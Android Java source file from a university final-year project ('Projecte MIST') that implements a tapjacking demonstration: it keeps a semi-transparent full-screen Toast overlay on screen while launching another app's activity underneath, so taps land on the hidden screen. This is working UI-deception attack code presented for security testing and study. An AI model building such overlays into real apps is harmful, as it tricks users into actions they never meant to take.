package com.mist;

import android.app.Service;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.graphics.Point;
import android.os.Handler;
import android.os.IBinder;
import android.os.Message;
import android.view.Gravity;
import android.view.LayoutInflater;
import android.view.View;
import android.widget.Toast;
/**
 * Projecte MIST
 * 
 * Treball de final de carrera. Ingenieria Tcnica en Informtica de Sistemes
 * Universitat Oberta de Catalunay
 * 
 * @Author UOC
 * @version Android 1.6, 2.1, 2.2
 */
public class TapjackingService extends Service {

	/** Opacity */
	private static final int OPA_TOTAL = 255;
	private static final int OPA_MIDDLE = 128;
	private static final int OPA_NONE = 1; 
	private static int ALPHA ;
	
	private static Tapjacking typeTest=null;
	
	/**	 */
	private static View vista_principal=null;

	/**
	 * Tipus de test a executar
	 * @param test - tipus de test a executar
	 */
	public static void setLoad(Tapjacking test){
		TapjackingService.typeTest = test;
	}

	@Override
	public IBinder onBind(Intent intent) {
		return null;
	}

	@Override
	public void onCreate() {
		super.onCreate();
		
		//Configurem l'opacitat
		switch(Integer.parseInt(Prefs.getOpacity( getApplicationContext() ))){
			case Main.OPACITY_TOTAL:
				ALPHA = OPA_TOTAL;
				break;
			case Main.OPACITY_NONE:
				ALPHA = OPA_NONE;
				break;
			default:
				ALPHA = OPA_MIDDLE;
		}
		LayoutInflater inflater = (LayoutInflater) getSystemService(Context.LAYOUT_INFLATER_SERVICE);
		// Construim el Toast
		Toast toast = Toast.makeText(getApplicationContext(), "", Toast.LENGTH_SHORT);
		vista_principal = inflater.inflate(R.layout.layout, null);
		vista_principal.getBackground().setAlpha(ALPHA);
		
		View icona = vista_principal.findViewById(R.id.apple);
		if(icona!=null && typeTest!=null){
			Point p = typeTest.getFirst();
			icona.setPadding(p.x, p.y, 0, 0);
		}
		//Afegim la vista construida al Toast 
		toast.setView(vista_principal);
		toast.setGravity(Gravity.FILL, 0, 0);
		fireLongToast(toast);
		launch();
	}

	static Handler h = new Handler(){
		@Override
		public void dispatchMessage(Message msg) {
			if(typeTest!=null){
				typeTest.move(vista_principal.findViewById(R.id.apple));
			}
		}
	};

	/**
	 * 
	 * Mtode que mant el Toast en pantalla
	 * @param toast - el Toast que s'ha de mantenir a la pantalla
	 */
	private void fireLongToast(final Toast toast) {
		//Nou fil
		Thread t = new Thread() {
			public void run() {
				int count = 0;
				int sleep = 100;
				int max_count = 1;
				if(typeTest!=null) max_count = typeTest.getNumMoves();
				try {
					while (true && count < max_count) {
						toast.setView(vista_principal);
						toast.show();
						
						if (count == max_count - 1) {
							vista_principal.getBackground().setAlpha(255);
							//Quan finalitzem els moviments, tornem a carregar la pantalla inicial
							ComponentName toLaunch;
							toLaunch = new ComponentName(
									"com.mist",
									"com.mist.Main");
							Intent intent = new Intent();
							intent.addCategory(Intent.CATEGORY_LAUNCHER);
							intent.setComponent(toLaunch);
							intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
							getApplication().startActivity(intent);
						}

						/*
						 * this short sleep helps our toasts transition seamlessly
						 */
						if(typeTest!=null) sleep = typeTest.getSleep();
						sleep(sleep);
						count++;
						h.sendEmptyMessage(0);
					}
				} catch (Exception e) {
					e.printStackTrace();
				}
				stopSelf();
			}
		};
		t.start();
	}

	/**
	 * Mtode que carrega l'intent en segon pla
	 */
	private void launch() {
		Thread t = new Thread() {
			public void run() {
				/*
				 * We sleep first in order for the toasts to consume the screen
				 * before the dialer activity launches
				 */
				try {
					sleep(2000);
				} catch (InterruptedException e) {
					e.printStackTrace();
				}
				if(typeTest!=null && typeTest.getIntent()!=null)
					getApplication().startActivity(typeTest.getIntent());
			}
		};
		t.start();
	}
}
